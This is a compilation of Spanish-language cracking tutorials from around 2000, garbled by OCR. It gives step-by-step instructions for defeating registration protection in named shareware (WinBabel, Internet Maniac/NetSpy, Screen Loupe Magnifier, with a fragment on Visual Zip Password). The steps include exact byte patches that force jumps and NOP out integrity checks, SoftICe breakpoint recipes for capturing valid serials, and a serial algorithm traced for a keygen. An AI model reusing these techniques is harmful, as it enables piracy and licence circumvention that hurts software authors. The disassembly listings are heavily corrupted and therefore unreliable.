:0003.5F83 7C1B jl SFAO 

:0003.5F85 7FOS jg 5FSC 

:0003.5F87 3D0500 cmp ax, 0005 

:0003.5F8SA 7614 ¡be SFAO 

* Referenced by a (U)jnconditional or (C)jonditional Jump at Address: 
1:0003.5F85(C) 


:0003.5F8C 16 push ss 

* Possible StringData Ref from Data Seg 064 -"WinBabel.exe" 
| 

:0003.5F8D 68B40B push 0BB4 

:0003.5F90 OE push cs 

:0003.5F91 ES1FFE call 5DB3 

:0003.5F94 83C404 add sp, 0004 

:0003.5F97 OBCO or ax, ax 

:0003.5F99 7405 je 5FAO 

:0003.5F9B C746FE0100 mov word ptr [bp-02], 0001 


Exactamente unas lineas mas arriba tenemos toas las condiciones 
vamos a estudiarlas 

Si nos fijamos en las primeras lineas que hemos puesto, vemos que el 
mensaje nos sale siempre que vamos a la dirección 

0003:5FAO 


A si que ya sabemos donde no tiene que ir. Tenemos en las lineas 


:0003.5F83 7C1B jl SFAO 
:0003.5F85 7FOS jg SF8SC 
:0003.5F87 3D0500 emp ax, 0005 
:0003.5F8A 7614 ¡be SFAO 


* Referenced by a (U)jnconditional or (C)jonditional Jump at Address: 
1:0003.5F85(C) 


:0003.5F8C 16 push ss 
* Possible StringData Ref from Data Seg 064 -"WinBabel.exe" 


:0003.5F8SD 68B40B push 0BB4 

:0003.5F90 OE push cs 

:0003.5F91 ES1FFE call 5DB3 

:0003.5F94 83C404 add sp, 0004 

:0003.5F97 OBCO or ax, ax 

:0003.5F99 7405 je SFAO 

Bien una vez estudiado esto pasemos a ver el codigo del mensaje: 
* Referenced by a (U)jnconditional or (C)jonditional Jump at 
Addresses: 

1:0003.5F4F(U), :0003.5F83(C), :0003.5F8A(C), :0003.5F99(C) 


| 
:0003.5FAO 837E0A00 cmp word ptr [bp+0A], 0000 


:0003.5FA4 7427 je SFCD 
:0003.5FA6 837EFE0O1 cmp word ptr [bp-02], 0001 
:0003.5FAA 7521 ¡ne 3FCD 


* Possible Reference to Dialog: DialoglID_0001, 
CONTROL _1D:0004, "No registrado!!" 

| 

:0003.5FAC 6A04 push 0004 

:0003.5FAE 16 push ss 


* Possible StringData Ref from Data Seg 064 -"WinBabel PAC 
(Probar Antes de " 

-"Comprar)" 

muy bien pues una vez visto esto... 

llegamos a la conclusionde que hay que obligarle a entrar y despues 
obligarle a ir a la dirección buena 

Cambiamos la linea: 

:0003.5F83 7C1B jl SFAO 

cambiando el 5F83 por EB1b --- JUMP 

Obligamos a saltar a la buena en: 

:0003.5FA4 7427 je 5FCD 

cambiando 5Fa4 por EBA4 -- JUMP 

Bueno ejecutamos el progama y vemos que funciona correctamente 
escepto una nag que nos sale al principio que pone NOTA:Esta copia 
de winbabel, bla bla bla... 

Vamos a ocuparlenos de ella buscamos en el W32Dasm y... bingo 


e  Referenced by a (U)nconditional or (Cjonditional Jump at 
Address: 
1:0003.7852(C) 


:0003.7869 837EF800 cmp word ptr [bp-08], 0000 
:0003.786D 743F je 78AE 
:0003.786F 6AFF push FFEFF 


:0003.7871 9AFFFFOOOO call USER.MESSAGEBEEP 
:0003.7876 6A00 push 0000 

:0003.7878 16 push ss 

* Possible StringData Ref from Data Seg 064 -"NOTA: Esta 
copia de WinBabel no " 

"est" 


:0003.7879 681811 push 1118 
:0003.787C 16 push ss 


* Possible StringData Ref from Data Seg 064 -"WinBabel" 


Pues cambiemos 743F por EB3F 

Y para dejar las cosas bien hechas no nos vamos a conformar con 
esto, quitaremos el texto PAC que nos sale en la arte de arriba de la 
aplicacion, buscamos winbabel 4.2(PAC) 


e Possible StringData Ref from Data Seg 064 -"WinBabel.exe" 


:0003.5ED1 687E0B push 0B7E 

:0003.5ED4 OE push cs 

:0003.5ED5 ESDBFE call 5DB3 

:0003.5ED8 83C404 add sp, 0004 

:0003.5EDB OBCO or ax, ax 

:0003.5EDD 7415 je 5EF4 

:0003.5EDF 6A00 push 0000 

:0003.5EE1 16 push ss 

* Possible StringData Ref from Data Seg 064 -"WinBabel 4.2 
(PAC)" 


:0003.5EE2 688B0B push 0B8B 
:0003.5EE5 FF7608 push word ptr [bp+08] 
:0003.5EE8 FF7606 push word ptr [bp+06] 
:0003.5EEB OE push cs 


:0003.5EEC E871FF call 5E60 

:0003.5EEF 83C40A add sp, OOOA 

:0003.5EF2 EB 13 ¡mp 5F07 

* Referenced by a (U)jnconditional or (C)onditional Jump at 
Address: 

1:0003.SEDD(C) 


:0003.5EF4 6A00 push 0000 
:0003.5EF6 16 push ss 
Cambiaos la linea: 
:0003.5EDD 7415 je SEF4 
por EB15 


Bueno pues cuando creemos que todo esta logrado, nos damos cuenta 
que al ejecutar el fichero nos da un error, " El fichero winbabel.exe 
ha sido modificado”, merdé, jejej, bueno continuemos pues... 
Buscamos algun detalle que nos diga donde esta esa proteccion de 
integridad, pero pensando llegamos a la conclusion que es mas 
sencillo tirrar del Softlce, y así no perdemos tiempo XD.. 

Pues venga, arrancamos el SoftIce, ejecutamos el loader y cargamos 
el programa, lo ejecutamos y aparecemos en el Soft, pulsamos 
CTRL+4D, y nos vuelve al programa ¡¡¡ meeee !!! suena la 
proteccion, y sin quitarla pulsamos CTRL+D para volver al Soft, 
vamos a poner un Break, or ejemplo por que no ponemos uno cuando 
desaparezca el mensaje, vamos... 


Tecleamos en Soft: 

HWND 

nos aparece la lista y buscamos nuestro programilla osea 
WINLABEL 


0c64 xxxxxx xx WINLABEL xxxxxxx 


0c64(2)xxxxx xx WINLABEL BUTTON 


OK, ya tenemos la ventana pillada por los innombreables, jejeje 
ahora ponemos un BREAK cuando desaparezca... 

bmsg 0c64 wm_destroy 

volvemos al programa y pulsamos el botón y.... Bingoooo. 
Salramos al Soft, si te fijas en la barra vende que hay encima de la 
linea de comando veras que pone USER(), esta es justo la zona que 
nos nos vale para nada, pulsamos F12, hasta llegar a la zona donde 
pone WINBABEL, aqui sí. 


Como es un programa a 16 bit no tenemos ni papas, del offset, asi 
que anotamos una fraccion para luego buscarla en el w32dasm, 
anotamos: 


XXXX:00F1 9400007F17 CALL USER. MESSAGEBOX 
XXXX:0024 GAFE PUSH XXXXXX 
XXXX:0026 CALL XXXXXXX 


Vamos al W32Dasm y buscamos por ejemplo 6AFE 
La primera aprada no nos dice nada pero la segunda llegamos a... 


:0008.001B 6A00 push 0000 

:0008.001D 6A00 push 0000 

:0008.001F 9A FFFF0000O call USER. MESSAGEBOX 

:0008.0024 6GAFE push FFFE 

:0008.0026 9AFFFFOOOO call 0001.0D48h 

:0008.002B 59 pop cx 

:0008.002C 1F pop ds 

Ummmmnm, esto nos suena... ok pues vamos osea que este es el 
codifo que comprueba la integridad, muy bien camos a ver quien lo 
llama, subimos arriba y ... 


Referenced by a CALL at Addresses: 

1:0008.0085, :0008.01CE, :0008.0274 

pues nada aqui tenemos nuestras llamada ahora solo tenemos que 
eliminarlas buscamos 0008:0085, 01CE y 0274 

0008.0085 Es78FF call 0000 sustituimos ES78FF por 909090 
0008.01CE Es2FFE call 0000 sustituimos ES2FFE por 909090 
0008.0274 E889ED call 0000 sustituimos ES89FD por 909090 


Bueno pues con esto solucionamos el problema de integridad, ahora 
ya tenemos nuestro programa oeprativo. 

Agradecer a MrCrimson, por sus animos, y como no a Karpoff, por 
su escelente trabajo. 


PAra cualquier duda aqui me teneis 
Saludos “DeeJay” 2000 


Capturar un serial valido mediante la función hmemcpy 


06 de Marzo de 2K 


Crack: Sable 


Herramientas: Softlce 3.x 4.x 


Introducción: 


Hola, este es mi primer tut y por medio de él quiero compartir un 
truco que me enseñaron unos amigos. 

Esta vez no usaremos los Apis típicos como ser: 
GetWindowText(a) o GetDlgltemText(a) sino que haremos uso de 
“hmemcpy”, no es un Api pero es el mejor. 

Este tut se lo dedico al amigo Karpoff. 


Al Atake: 


Carga el Sice (así le llamaremos al SoftIce, OK) y pon un 
breakpoint en hmemcpy o sea que debes escribir esto BPX 
HMEMCPY y presiona “Enter”; listo ya pusiste el breakpoint. 
Ahora carga el programa víctima e introduce tus datos y el 
numero de registro falso por Ej: 


Name: Sable 
Serial: 123456 


Luego presionas aceptar y ya estas dentro del Sice. 


Lo que debes hacer ahora puede parecer un poco loco o sin 
sentido pero tienes que hacerlo es parte del truco. 

Aprieta F10, entre 17 a 25 veces, hasta que veas algo parecido a 
esto: 


PUSH ECX 

SHR ECX,2 ; el número de palabras para copiar 

REPZ MOVSD copia desde ds:esi (32 bit) a es:edi (32 bit) (tu 
debes pararte aquí) 

POP ECX 

AND ECX,3 

REPZ MOVSB :igual que repz movsd, pero solo un byte 
XOR DX 

XOR AX 


Listo? Bueno, entonces escribí en el Sice esto y presiona enter: 
D DS:ESTI (si tu programa es de 32 bit) o D DS:SI (si es del6 bit) 


En este momento debes ver en la Ventana de Datos tu nombre o el 
número de serie falso u otra cosa que pusiste. 
Muy bien sigamos, ahora debes escribir esto: 


D ES:EDI (si tu programa es de32 bit) o D ES:DI (si es de 16 bit) 


Esto mostrará el lugar donde se copiará la información por Ej.: 
22bf:00000000 

Notas el segmento extraño (22bf). Si pusiéramos un BPR en este 
rango de memoria no rompería en lo absoluto. Al haber apretado 
F10 anteriormente toda la información que introdujiste es copiada 


en “repz movsb”. 
Vas entendiendo hasta ahora. 
A esta altura tu debes estar tecleando: 


PAGE 22BF:00000000 (este es solo en Ej. Tu debes poner el offset 
que tengas en la ventana de datos). Luego presiona enter (después 
de introducir un comando en el Sice siempre debes apretar enter) 
y verás algo parecido a esto: 


Linear Physical Attributes Type 


80284960 01603960 PDAURW System 


Lo que harás ahora es poner un BPR (punto de ruptura en el 
rango de memoria) a la dirección de situación lineal. Para hacer 
esto necesitas saber cuantos bytes están en el rango, para esto 
debes usar el seleccionador 30. 


Ejemplo: 

BPR 30:80284960 30:50284969 RW 

Esto apenas puso un descanso en el rango para 9 bytes durante el 
acceso a RW (lectura-escritura). 

Si tu no sabes como sumar los 9 bytes para conseguir el número 
que aparece en verde puedes tipear lo siguiente: 

D 30:80284960 


Y podrás copiarlo de la ventana de datos. 


Siempre usa el seleccionador 30, porque siempre está. 


Todo lo que hemos hecho es básicamente para no tener que estar 
preteando (F12) como bestias. Este truco es sumamente útil para 
los programas de 16 bits, porque el segmento siempre cambia. 


Ahora puedes quitar el bpx hmemcpy ( bc 00) y comenzar a 
teclear alegremente FS, observa bien la ventana de datos por que 
en cualquier momento aparecerá tu serial válido. 


Importante: 


“El uso de este material es solo para uso educativo, por ahora los 
cracks son ilegales cada cual es responsable del uso que le de a este 
tutorial, el autor no se hace responsable de nada.” 


Saludos a Todos 
Sable 


ICI 28 


NetSpy 1.5 - Cómo regalar un programa a través de la winAP!.... 


Saludos koleguitas! en este texto vamos a ver cómo por vagancia o ignorancia un 
programador nos regala su producto por usar funciones incluídas en la winAPlI que 
supongo que ya sabréis es un conjunto de librerías que contienen funciones preparadas 
como apoyo al programador para hacerle el trabajo más fácil y también para hacérnoslo 
a nosotros claro... 


Antes de nada agradecer a Mr.Black toda su ayuda, desde sugerirme el programa hasta 
ayudarme con el win32ASM, que le vamos a hacer soy muy torpe, a pesar de seguir el 
ejemplo de Mr.Crimson y de tener el código completito no he sido capaz sin su ayuda de 
codificar el keygen, la programación no es lo mío... 


¿? Herramientas a utilizar : 


NetSpy 1.5 por Sumit Birla. 
SoftlCe 4.0 de Numega Tech. 
WDASM 8.93 de URSoftware 


¿? Cambiando de método... 


Normalmente los programas de tipo "name/serial" los repaso directamente con SoftlCe, 
en muchos me llevo el trastazo cuando luego los desensamblo (menudo palabro) ya que 
veo que habría sido más fácil empezar por desensamblarlo, en esta ocasión como no 
tenía SoftlCe cargado y por no reiniciar pues empecé tirando de WDASM y SDRs, el 
ejecutable protegido es Internet Maniac.exe ... 


+ PTeferenced br a (D/nconditional or (Cjonditional Jump at Address: 
|:004051c1 15) 
| 


* Possible S5tringbata Pef from Data 0b3 -+"Failure!" 
| 
20040520F 6SBS354100 push 004135B8 


* Possible Stringbata Pef from Pata 0b3 ->+"Incorrect registration code!" 
| 

20040514 68285354100 push 00413598 

200405219 56 push exsi 


+ Peference To: USER>32.MessageBoxA, Ó0rd:01C3k 
| 
200405214 FF1554114100 Call deord ptr [00411154] 


Mil veces visto, tenemos nuestra "messagebox" y a ella nos lleva un salto 
condicional...vamos a verlo...listado muerto pa la people...ya veo a más de uno como 
loco invirtiendo el salto, no! ;P 


c20040514Db £D54d2448 lea edx, dword ptr [esp+42] | 
200405181 S8D442408 lea eax, dword ptr [esp+0858] 
:004051BE5 52 push edx 

200405186 £0 push eax | 
20405180 230408 add esp, 00000008 | 
c2004051EF S5cÓ0 test ax, Sax 

200405101 44A Je O004050oT 


* Heference To: EKEPNEL3Z.WritePrivateProfileSstringA, Urd:0313h 


La dirección que está en rojo es el salto anterior, si no saltamos al mensaje de error qué 
hacemos? pues escribir los datos de registro en un fichero .ini mediante la función de la 
API que véis en azul...seguimos en busca del serial correcto así que vemos antes de 
nuestro salto condicional que se mete algo en eax y edx, luego se pasa a la función, 
serán nombre y serial? seguro...una bonita llamada, canta un poquito, vamos a ver qué 
nos dice la amiguita... 


200407FD4d BB7Y42dZ8 mor es, dword ptr [esp+z28] 
20040 7FDS 56 push exsi 


* Peference To: KEPRNELS2. l1strleni, Ord:0335h 
| 


20040 7FDS FF1560104100 Call duord ptr [00411060] 
0040 7PFDF S3FS04 cop eax, DOD0o0o0bood 

2040 7FEZ “LO? Jae DO4O7FER 

200407FE4 33520 XOF ax, eax 

2O0O04dO07FEÉS 5E pop esil 

20040 7FEY 23040 add esp, DODo00ozo 
O04dO07?FEA ES ret 


Aparecemos por aquí, una bonita llamada a otra función de la API, a esta función 
simplemente le pasamos la dirección que apunta a una cadena y ella nos devuelve en 
eax su longitud en este caso en bytes, sin haber tocado SoftlCe nos podemos hacer una 
idea al ver la comparación y el salto, el nombre o el número tienen que ser al menos de 4 
bytes de longitud ya que como veis si el salto no se da ponemos eax a 0 y volvemos de 
la llamada, recordáis qué había después de la llamada? si EAX=0 "Error número 
incorrecto”...Vamos a seguir con los nuestro, evitando el mensaje de error, el salto se 
cumple, a ver qué sigue... 


+ HReferenced by a (Winconditional or (Cionditional Jump at Address: 


2OOdO7FEE OFEE14601 mMoOvYsx eax, byte ptr [esi+01] 
3OOdO7FEF OFBE1¿EOZ mMOYSX e0x, byte ptr [esi+0z] 
20040 7FF3 D1IEO shl eax, 1 

2O0O04dO7FFS 50 push eax 

200407FF6 OFEE4EOS mMoOrsx eax, byte ptr [esi+03] 
00407 FFA Cl1El102 shl ecx, ÓZ 

20040 7FFDE 5l push ecx 

20040 FFE BES0A4000000 mov ecx, DODODODA 

200408003 29 cda 

200408004 F7FS idivr ecx 

200408006 ESAOCOS4FA mor eax, FisdCóaA0 

2004O0S00BE SBLA mor eCcx, edx 

2 0040S800D ESEO sh1l eax, el 

20040S800F SDb4c2406 lea ecx, dword ptr [esp+0C] 
200408013 50 push eax 


* Possible Stringlata Pef from Pata 063 -+"*010u-+d+d" 
| 

200408014 68385384100 push O00413B38 

2004080139 51 push ecx 


+ Peference To: USERS. wseprintiíi4, Ord:0ZE 3h 
| 
200408014 FF1544114100 Call deord ptr [00411144] 


Sorpresa agradable, tenemos ahí abajo una llamada a wsprintfA, esa API simplemente da 
un formato determinado a los datos que le pasemos como parámetros, el formato se 
determina mediante especificaciones como la que tenemos en verde jum jum tiene buena 
pinta. No sabemos qué tenemos en ESI pero me apostaría el pescuezo a que es el 
nombre y el programa está calculando el serial verdadero, vamos a ver un poco más 
abajo... 


+ Reference To: USERS32 weprintfi, Ord: 02B3h 
| 


20405014 FF1544114100 Call duord ptr [00411144] 
¿00408020 6B542440 mor edx, dword ptr [esp+40] 
2004058024 E3E414 add esp, 00000014 

2 00dO0s0z7 SD4ddZ404 lea eax, dword ptr [esp+04] 
c004d0S80zZzB 5 push edx 

c20040s0zc 50 push eax 


+ PTeference To: KEPNEL3Z.l1strempA, 0rd:032%h 
| 


20d O0S0EDb FF1544104100 Call duord ptr [00411044] 
200405033 FYDS ne eax 

¿00408035 1Ec0 shk eax, eax 

200408037 5E pop esi 

00405038 40 inc eax 

200408039 E3SE4z0 add esp, O00000zbo 
0040580 3c Es ret. 


Viendo esto ya me apuesto a mi hermana, el resultado de wsprintfA, es comparado con 
algo mediante la función IstrempA, a esta función le pasamos como parámetros las 
direcciones de las cadenas a comparar, si los valores son iguales la función devuelve en 
EAX el valor CERO, después hacemos unas operaciones con EAX y volvemos de la 
llamada, EAX no es cero luego registro correcto, escribimos los datos en el fichero .ini y 
gracias por pagar hermano... 


¿? Comprobando con SoftICe... 


Todo esto son suposiciones así que vamos a nuestro amigo SoftlCe a que nos lo 
confirme, cargamos el Internet Maniac...metemos unos datos falsos (ambos mayores o 
iguales a 4 para no salir prematuramente), pasamos a SoftlCe y ponemos un punto de 
ruptura tal que << bpx hmemcpy >>, le damos al botón de aceptar y aparecemos en 
SoftlCe, vamos dando << F12 >> hasta estar en el código del Internet Maniac, una vez allí 
borramos nuestro bpx << bc 0 >> y ponemos otro justo antes del CALL, en la dirección 
:004051AD << bpx 4051 AD>>, le pegamos a << F5 >> y ya tenemos el rollo, aquí están las 
instrucciones explicadas según vamos a ir viéndolas, creo que a estas alturas SOftlCe 
debería estar controlado... 


lea edx, dword ptr 
[esp+48] 
lea eax, dword ptr 
[esp+08] 


:004051 AD 
:004051B1 
:004051B5 push edx 


:004051B6 push eax 


:004051B7 call 00407FDO 
:00407FDO sub esp, 00000020 
:00407FD3 push esi 


mov esi, dword ptr 


:00407FD4 [esp+28] 


:00407FD8 push esi 


, Call 
ii a EÓS KERNEL32.IstrlenA 


:00407FDF cmp eax, 00000004 
:00407FE2 jge 00407FEB 


movsx eax, byte ptr 
[esi+01] 


movsx ecx, byte ptr 
[esi+02] 


:00407FEB 
:00407FEF 


:00407FF3 shl eax, 1 


:00407FF5 push eax 


movsx eax, byte ptr 
[esi+03] 


:00407FFA shl ecx, 02 


:00407FF6 


:00407FFD push ecx 

:00407FFE mov ecx, 0000000A 
:00408003 cdq 
:00408004 ¡div ecx 
:00408006 mov eax, FA34C6A0 


:0040800B mov ecx, edx 


:0040800D shl eax, cl 


¿cargamos en edx la dirección donde tenemos el 
número de serie falso 


¡cargamos en eax la dirección donde tenemos el 
nombre 


:empilamos las dos direcciones, le pasamos a la 
rutina que controla el registro 


:los parámetros para que decida si son correctos los 
datos 


¿vamos a la rutina 
¡ajustes en la pila 
:salvamos el valor de ESI 


¿movemos a esi el nombre 


:se lo pasamos a la función para que calcule su 
longitud 


:calculando... 


si es menor que 4 registro incorrecto... 


si es mayor vamos por buen camino... 


¡dejamos en eax el segundo byte de nuestro nombre 
(ASCII segunda letra) 


¡dejamos en ecx el tercer byte de nuestro nombre 


:¡desplazamos eax un byte a la izquierda = añadimos 
un cero a la derecha 


:empilamos ese valor **para wsprintfA** 


¡dejamos en eax tenemos el cuarto byte de nuestro 
nombre 


:¡desplazamos ECX dos bytes a la izquierda 
:empilamos ese valor **para wsprintfA** 
:inicializamos ECX a 10 

¡reseteamos EDX 

¡EAX = EAX /entera ECX , EDX = resto 
¡EAX contiene número mágico 


¡ECX contiene el resto de la división entera anterior 


:¡desplazamos número mágico un número de bytes 
igual al resto obtenido 


-0040800F lea ecx, dword ptr metemos en ECX la dirección donde guardaremos 


[esp+0C] serial verdadero 
:00408013 push eax :empilamos ese valor **para wsprintfA** 
:00408014 push 00413B38 ¡le pasamos a wsprintfA el formato %010u-%d%d 


¡le pasamos a wsprintfA la dirección donde dejar el 


:00408019 push ecx resultado (serial verdadero) 


. Call j 

:0040801A USER32.wsprintfA :calculando... 

-00408020 MOV edx, dword ptr ¡edx apunta al número de serie que hemos 
[esp+40] introducido (el falso =)) 

:00408024 add esp, 00000014 ¡ajustes en la pila... 

-00408027 lea eax, dword ptr :en EAX tenemos la dirección donde está el serial 
[esp+04] verdadero 

:0040802B push edx ¡pasamos los parámetros a la función que los 

compara 

:0040802C push eax 

:0040802D call ¡comparando 

KERNEL32.IstrempA *9TP e 

:00408033 neg eax :el resultado de la comparación es negado 


:restamos teniendo en cuenta el flag de acarreo, C=1 
luego EAX=EAX-EAX-1 


:00408037 pop esi ¡devolvemos a ESI el valor anteriormente salvado 


:00408035 sbb eax, eax 


:00408038 inc eax ¡incrementamos EAX 
:00408039 add esp, 00000020 ¡ajustes en la pila 
:0040803C ret ¡volvemos de la llamada 
:004051BC add esp, 00000008 ¡ajustes en la pila... 


:004051BF test eax, eax :es correcto nuestro número de serie? 


miramos el flag de cero, Z=1 luego es más falso que 


:004051C1 je 0040520D Moe, No Registrado! 


Bueno es tremendamente sencillo sacar un número correcto, y el keygen no es nada del 
otro mundo, sólo tenemos que trasladar el algoritmo y que saque el resultado en vez de 
chequearlo...esto queda para vuestras aventajadas mentes... 


¿? Last words... 


Como siempre dejar claro que karlitoxZ no es más que un novato en esto, mucho camino 
todavía por recorrer... aquí estoy para serviros en lo que me sea posible... 


Saludos, agradecimientos, un piso en la luna y mil millones de dólares selenitas a 
ACaR191, Chochis, josepZ, Crokonite, esiel2, [xasx], D_A, skuater, karpoff, picsone, 
Mr.Black, Mr.White, Mr.Cyan...un placer conoceros a unos más y a otros menos ;P 


Nos vemos en exp13 si es que algún día llega... 


Expediente 12 (09/02/00) por karlitoxZ, parte activa de: 


ER 


TATCRÁCH TEAM 


Visita la página que estoy rutando con ¿CaR191, llena de recursos para empezar a 
crackear y unas cuantas cosas más, completamente en castellano!!! 


[ONTHEROGKs!|] 


Karpoff Spanish Tutor 


Programa: Screen Loupe Magnifier v 4.7 
Win95/Nt 


PROTECCION: | NAME / SERIAL 


Descripcion: aplicación para dar zoom en ciertas partes de tu pantalla 
Dificultad: Principiante 


DOWNLOAD: | http://www, execpc. cony —sbd 


Herramientas: Soft-| ce 


CRACKER: Profesor X /TnT FECHA: 24/04/2000 


| INTRODUCCION 


Bueno amigos antes que nada quisisera decirles que si encuentran algun error en el tutorial favor de 
hacermelo saber a mi correo electronico profesor_x hotmail.com, ya que esta es mi primera vez que hago un 
tutorial espero poder explicar la forma de sacar un numero de serie valido para el Screen Loupe Magnifier v 
4.7 for Windows 95 /Nt.- 


| AL ATAKE 


bueno empezemos para este proposito usaremos el SOFT-ICE con el cual obtendremos un numero de serie valido, que 
variara segun el nombre y organizacion que insertemos en la ventana de registro ok!! 


les hago una pregunta amigos!!! cual seria el proceso a seguir para obtener el numero de serie, reflexionemos un 
poco.mmmm... bueno sale ya esta... lo esencial aqui seria encontrar la rutina en la cual el programa compara nuestro numero 
de serie con el numero de serie original, tambien podriamos ocupar otra forma de ataque la que seria modificando un salto 
condicional, pero como se dice aqui en mi pais 


INT ESA ES OTRA HISTORIA !!!! JAJA 


por ahora ocuparemos la primera opcion que es la de buscar un serial valido ok!!! 


lo primero sera reiniciar la P-CERA y cargar el SOFT-ICE una vez cargado el softice abrimos el programa screen loupe y nos 
vamos a el menu Help=>Register eh insertamos un User NAme, Organization, y cualquier registro en mi caso insertare: 


User Name: PrOfEsOr X 
Organization: TnT Crack Team 
Registrations: 111111 


despues de insertar los datos en la ventana de registro nos vamos al SOFT-ICE pulsando CTRL-D Y aparece la 
ventana de edicion del SOFT-ICE despues insertamos un breakpoint recordemos que existen muchos tipos de 
breakpoints desde ahora los llamaremos (bpx) ok!! 


entonces probamos con bpx (MESSAGEA), 


bueno continuemos volvemos a pulsar CTRL-D y regresamos al programa inmediatamente damos click en OK! 
y es ahi donde empieza la emocion, pero rayos!! que PASOOOO !!!! POR LA SANTA GLORIA DEL NIÑO DE 
ATOTOCHE !!!! no salio nada de nada me lleva la que metrajo que sera !!! bueno probemos con otro bpx. a ver 
mmmmmmmm!!! :) cual sera bueno, (RECUERDEN QUE NO SOY UN EXPERTO PARA SABER CUAL ES 
El BPX CORRECTO A PONER) osea que probemos con otro sale !! a ver si ponemos un bpx getdlgitemtexta, 
PROBEMOS.. 


insertamos bpx getdlgitemtexta pulsamos CTRL-D y saltamos al screen loupe y damos click en ok! y voila!!! ahora si 
saltamos directamente al SOFT-ICE,. 


User32! Getdlgitemtexta 

015F:BFF51743 MOV CL,A1 

WHAT'S THIS!!! es la primera referencia a el bpx getdlgitemtexta ahorita estamos en la refencia a el User32.dll 
ahora pulsamos f12 para saber quien mando hacer la llamada y nos manda a : 

015F:0040e7fb CALL [USER32! Getdlgitemtexta-] 

015f:0040e801 POP EDI 

015D:0040e802 POP ESI AQUI CAPTURA EL USER NAME 


AERAAKAAAKK KA KK KK A KKAK AAA 


en este paso vemos que el SOFT-ICE nos a capturado el nombre del User Name lo podremos ver y comprobrar esto 


ProfEsor X.... 
TECLEAMOS F12 otra vez..... 


volvemos a teclear F12 Y en este paso vemos que el SOFT-ICE nos a capturado el nombre de la Organization, lo 
podremos ver y comprobrar esto si en la pantalla del SOFT-ICE ponemos D ESI en la ventana de caracteres 


volvemos a teclear F12 Y en este paso vemos que el SOFT-ICE nos a capturado el numero de registro, lo podremos 
ver y comprobrar esto si en la pantalla del SOFT-ICE ponemos D ESI en la ventana de caracteres aparecera 0000:0000 


bueno esto parece que ya se cocio hemos visto que nos capturo ya los datos que insertamos ahora solo nos falta 
buscar a donde compara el numero que insertamos con el que genera la aplicacion, podemos usar dos metodos 
tecleando F10 o F8 pero F10 seria el mas indicado ya que con este no entramos a ninguna llamada hecha por el 
programa en cambio si usamos el F8 entrariamos a todas las llamadas que haga el programa y se nos haria un 
chorizo de instrucciones que para que les cuento ,,,,;) 


damos F10 varias veces hasta que encontramos una comparacion sospechosa 
despues de varios F10 nos encontramos esto: 

015F:00406685 add esp,08 

015F:00406688 cmp ebx,eax 


veamos si aqui es donde se compara nuestro numero falso con el generado por el programa que es el que 
corresponde a nuestros datos. VEAMOS!!!! ponemos la siguiente intruccion: 


? EBX = 111111 el nuestro 


parece que si es la comparacion apuntemos esos numeritos magicos y damos F12 para terminar la ejecución del 
programa y vamos he insertamos el numero magico y ****"""""HNIVOILA!! programa registrado 


pues es todo por el momento, espero que les guste, y recuerden espero comentarios , sugerencia y criticas , NOTA: 
espero que me entiendan mi explicacion, y disculpas por los horrores ortograficos, cualquier duda haganmelo saber 
sale!!!! ya que su apoyo he interes sera el aliciente para continuar escribiendo mas tutoriales. 


NOTA: espero que entiendan mi explicacion, y disculpas por los horrores 
ortograficos, cualquier duda haganmelo saber sale!!!! 


profesor x(hotmail.com 
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INTRODUCCION 


Tutorial de Crackeo Para Newbies desde Cero HH PROYECTO 17 4H 


Hola Gentes !! despues de un par de meses sin escribir nada hoy me apetece y por 
peticion de un amigo me dispongo a darle un repasillo al Visual zip password, los que 
habeis seguido mis manuales sabreis que ya nos enfrentamos a este programa en su 
version 3.12, ahora estamos en la v4 y no tiene nada que ver :-), si recordais la 
version 3.12 estaba comprimida, protegida contra debugger y desensablado y estaba 
limitada a no poder buscar password mayores de 5 digitos en esa ocasion hicimos un 
loader. Ahora veamos que nos cuenta la version 4. 


AL ATAKE 


Como siempre fundamental prepararnos el terreno para tener todo a mano, hacemos una copia de 
VZprp.exe con el nombre cvzpre.exe y cargamos nuestro debugger softice o TRW2000 (da igual), 
ahora nos haremos con toda la informacion posible sobre la victima, existen muchos programas 


que nos dan informacion sobre el encabezado PE y el compilado de la victima yo uso el File 
Analicer, solo tenemos que pinchar con el mousse una copia de la victima osea cVzprp.exe y 


arrástrarla sobre fa.exe el resultado es: 


Image Flags(2) RelocatStrip(.) LineNumStriptx) LocSymbStrip(x) 
HeapStack Reserve: 00100000/00100000 
HeapStack Commit 00001000/00004000 
Data Sizes InitDataSize : 00050200, UninitDataSize 
Other Sizes(1) CodeSize 0008CC00, ImageSize 
Other Sizes(2) HeaderSize 00000400, OpHeaderSizetHD: OOOOONEN 
Bases BaselfCode : 00001000, BaselflData 0008E000 
fAilignments FileAlignment: 00000200, SectionfAlignment: 00001000 
Objects table Hame VirtSize ERVA PhysSize PhysUOffs Flags 
Object 1) CODE 0008CB7C/|00001000/0008CC00|00000400/|60000020 
] 2) DATA 00001ED04|0008E£000/|00002000|0008D000|¡C0000040 
3) BSS 00006505 ¡00020000 |00000000|0008F000|¡C0000000 
4) .1data 000025€2/|00097000/00002600|0008F000|C0000040 
5) .tls 00000010|00094000/|00000000|00091600|C0000000 
6) .rdata 00000018 |0009B8000/00000200|00091600|50000040 
D .reloc D000A1E0 |0002C000 00004200 |00091800 ¡50000040 
( 8) .PSre 00041800|00047000/00041800|0009B400|50000040 
Processed with(1): 
DOSEXE part sizes: Header 64 bytes, image 528 bytes, overlay 205136 bytes 
WINEXE part sizes: Header 4032 bytes, image 901696 bytes, overlay Il bytes 
Entrypoint = DOS 64400000040, RUA 580256/0008DA40, WIN 577184/0008CEA0 
Information(1) : Querlay start from 905728/0000D200 
Extension ( 13: DOS executable file 


00000000 
D00E9000 


A simple vista ya sabemos que vVvzprp.exe no esta empakado y no esta protegido contra 
desensamblado, de estar protegido tendriamos en la seccion CODE, Flags un valor de C0000040 


(para mas informacion sobre encabezados PE leer los trabajos de nuMIT_or explica paso a paso y 


detalladamente todo lo que veis en la imagen.) 


Bueno ya sabemos algunas cosillas, no tendremos ningun problema a la hora de desensamblarlo 
(por lo general) ahora debemos averiguar que limitaciones tiene la victima, solo con leer en la 
ayuda del programa su autor nos dice ya cuales son las restricciones que segun dice son: un 
horrible NagScreen cada 1.000.000 de password en modo brute force y en otros modos Cada 100.000 
password, por si acaso lo comprobamos no valla ha ser que sea un pequeño engaño para 
despistarnos a la hora de crackearlo, y bueno yo por mas pruebas que hago me escupe el nag Cada 
10.000.000 de password en brute force y cada 10.000 password en otros modos Mnnnn que 


mariconcete jeje. 


Como atacamos a este programa?? aparentemente no parece que sea muy dificil no esta comprimido, 
no tiene proteccion antidasm y tampoco antidebugger (lo se, por que tengo el Softice cargado y 
